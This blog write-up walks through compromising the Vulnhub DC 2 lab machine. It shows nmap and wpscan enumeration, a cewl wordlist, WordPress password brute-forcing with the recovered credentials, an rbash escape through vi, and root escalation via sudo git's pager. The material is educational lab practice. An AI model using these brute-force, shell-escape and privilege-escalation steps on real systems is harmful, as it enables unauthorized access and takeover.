Vulnhub - DC 2

Posted on | In
My writeup on DC 2 box.

Box Stats

Box Info Details
Box Name : DC 2
Series : DC
Difficulty : Easy/Medium
Release Date : 22 Mar 2019
OS : GNU/Linux
Maker : DCAU
Download : DC 2
Recommended : Yes :heavy_check_mark:

Summary

Hello all, let’s continue the DC series. This box it’s about wordpress exploitation, we enumerate wordpress and we find out 3 users and we start a brute force on them. The users use the same password on the system so we get access using SSH. Once we get shell we have to bypass rbash. Then we can use switch to user jerry and privesc to root is a simple sudo -l exploitation. Let’s pwn it!

PoC

Target IP

Always first step is to find target IP address, i prefer to use the arp-scan utility. Then we’ll save the IP address in a variable.

1
2
3
 
$ arp-scan --localnet | grep "VMware"
192.168.1.16	00:0c:29:a2:5d:8f	VMware, Inc.
$ ip=192.168.1.16

Enumeration/Reconnaissance

Now as always let’s continue with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 13:47 EET
Nmap scan report for dc-2 (192.168.1.16)
Host is up (0.00098s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 00:0C:29:A2:5D:8F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds

$ nmap -p 80,7744 -sC -sV -oN nmap/dc2.vulnhub $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 13:50 EET
Nmap scan report for 888.darknet.com (192.168.1.16)
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)

We can see nmap tell us an important thing: http-title: Did not follow redirect to http://dc-2/ We have to add dc-2 to our /etc/hosts file.

For beginners, /etc/hosts file translate hostnames to IP addresses. In CTF we use it for 2 reasons:

  • It’s easier to remember the box name than remembering the IP address.

  • The main reason it to deal with virtual hosts. Virtual hosts allow us to host multiple domains or sites on a single server. If we browse the box if the raw IP address, the host header won’t be set properly and we’ll end up with a default page or error page.

1
2
3
4
 
$ echo "192.168.1.16 dc-2" | tee -a /etc/hosts
192.168.1.16 dc-2
$ cat /etc/hosts | tail -1
192.168.1.16 dc-2

Now if we visit the website, we can see it loads without errors & is running wordpress:

Since it’s running wordpress, let’s fire up a wpscan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 
$ wpscan --no-banner --url http://dc-2/ -e ap,u -o scans/wpscan1.txt
$ cat scans/wpscan1.txt  
[+] URL: http://dc-2/ [192.168.1.16]
[+] Started: Sun Dec 20 14:13:31 2020

...data...

[i] No plugins Found.

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

We have 3 users, perfect. In wordpress menu we can see a flag that provide us a really important tip!

Let’s use cewl to generate a custom wordlist.

1
2
3
4
 
$ cewl http://dc-2/ -w wordlist.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
$ wc -l wordlist.txt
238 wordlist.txt

Shell as tom

Now let’s start a brute force attack on 3 users, using wpscan.

1
2
3
4
5
6
7
 
$ wpscan --no-banner --url http://dc-2/ -U admin,tom,jerry -P wordlist.txt

...data...

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

Perfect, i tried to login as tom using SSH and it worked! But sadly we’re into a restricted shell. A restricted shell only allows us to perform specific system commands.

1
2
3
4
5
6
7
 
$ ssh tom@$ip -p 7744
tom@192.168.1.16's password:

tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ id
-rbash: id: command not found

To understand if we’re into a restricted shell we can simply check which shell we are using:

1
2
 
tom@DC-2:~$ echo $0
-rbash

To bypass that now there are ton of ways we can try, but in CTF there is a common way using vi/vim:

Execute vi and type:

1
2
3
 
:set shell=/bin/bash
after
:shell

Now we’re into bash but we still can’t execute commands.

1
2
3
4
 
tom@DC-2:~$ whoami
bash: whoami: command not found
tom@DC-2:~$ id
bash: id: command not found

Seems like PATH environment variable is broken, i googled for a default PATH and i found the ubuntu’s default and i used it and it worked!

1
2
3
 
tom@DC-2:~$ export PATH=/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
tom@DC-2:~$ whoami
tom

Shell as jerry

Now we can simply switch to user jerry using the password from the brute force.

1
2
3
4
 
tom@DC-2:~$ su - jerry
Password:
jerry@DC-2:~$ whoami
jerry

Shell as root

Privilege escalation to root is simple, we just have to check sudo -l that tell us we can execute git as root.

1
2
3
4
5
6
 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

1
2
3
4
5
6
 
jerry@DC-2:~$ sudo git -p help config

!/bin/bash
root@DC-2:/home/jerry# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Reading the flag(s)

1
2
3
4
5
6
7
8
9
 
root@DC-2:~# cat final-flag.txt

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom

Until next time keep pwning hard! :fire: